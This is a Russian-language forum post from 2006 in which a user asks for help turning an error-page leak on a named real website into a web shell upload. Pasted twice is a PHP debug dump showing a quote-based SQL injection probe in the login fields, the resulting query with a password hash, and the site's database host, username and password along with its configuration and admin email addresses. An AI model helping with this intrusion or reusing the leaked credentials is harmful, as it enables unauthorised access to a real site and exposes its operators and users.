PhoenixLion
23.05.2006, 12:45
Помогите использовать багу сайта в качестве заливки шелла на сайт... Бага показывает пароль на скуль базу. А база не работает.
http://www.mgkit.ru/?file=login - Сайт
Бага:
D:\inet\www\engine\lib\db.php [ 53 ]
Warning: mssql_connect(): Unable to connect to server: sun
Backtrace
5 db.php 53 mssql_connect( String[3], String[3], String[13] )
4 db.php 89 db_connect( )
3 auth.php 180 db_query( String[91] )
2 main.php 59 auth_authenticate( )
1 index.php 17 include( String[27] )
sun
www
вшышптфещк321
SELECT * FROM mgkit_users WHERE login='э\''' AND passwd='024c94d6e03b6f67a86b952b914816c7'
D:\inet\www\engine\main.php
Local variables
CONF = Array[18]
Array
(
[site_title] => МГКИТ
[folder] => /
[site_mail] => info@chat.ru
[admin_mail] => tsott@chat.ru
[content_encoding] => windows-1251
[news_count] => 4
[index_template] => 1
[db_host] => sun
[db_user] => www
[db_passwd] => вшышптфещк321
[db_name] => www
[db_table_prefix] => mgkit_
[db_auth] => 1
[plugins_services] => Array
(
[login] => engine/plugins/login.php
[register] => engine/plugins/register.php
[users] => engine/plugins/users.php
[news] => engine/plugins/news.php
[shedule] => engine/plugins/shedule.php
[forum] => engine/plugins/forum.php
)
[plugins_modes] => Array
(
)
[plugins_setup] => Array
(
[forum] => Array
(
[0] => Форум
[1] => /a/setup/forum
[2] => engine/plugins/forum
)
)
[rights] => Array
(
[news] =>
)
[_] => */ ?>
)
HTTP GET variables
file = String[5]
HTTP POST variables
_done = String[1]
login = String[3]
э\'
password = String[2]
\'
sb = String[5]
http://www.mgkit.ru/?file=login - Сайт
Бага:
D:\inet\www\engine\lib\db.php [ 53 ]
Warning: mssql_connect(): Unable to connect to server: sun
Backtrace
5 db.php 53 mssql_connect( String[3], String[3], String[13] )
4 db.php 89 db_connect( )
3 auth.php 180 db_query( String[91] )
2 main.php 59 auth_authenticate( )
1 index.php 17 include( String[27] )
sun
www
вшышптфещк321
SELECT * FROM mgkit_users WHERE login='э\''' AND passwd='024c94d6e03b6f67a86b952b914816c7'
D:\inet\www\engine\main.php
Local variables
CONF = Array[18]
Array
(
[site_title] => МГКИТ
[folder] => /
[site_mail] => info@chat.ru
[admin_mail] => tsott@chat.ru
[content_encoding] => windows-1251
[news_count] => 4
[index_template] => 1
[db_host] => sun
[db_user] => www
[db_passwd] => вшышптфещк321
[db_name] => www
[db_table_prefix] => mgkit_
[db_auth] => 1
[plugins_services] => Array
(
[login] => engine/plugins/login.php
[register] => engine/plugins/register.php
[users] => engine/plugins/users.php
[news] => engine/plugins/news.php
[shedule] => engine/plugins/shedule.php
[forum] => engine/plugins/forum.php
)
[plugins_modes] => Array
(
)
[plugins_setup] => Array
(
[forum] => Array
(
[0] => Форум
[1] => /a/setup/forum
[2] => engine/plugins/forum
)
)
[rights] => Array
(
[news] =>
)
[_] => */ ?>
)
HTTP GET variables
file = String[5]
HTTP POST variables
_done = String[1]
login = String[3]
э\'
password = String[2]
\'
sb = String[5]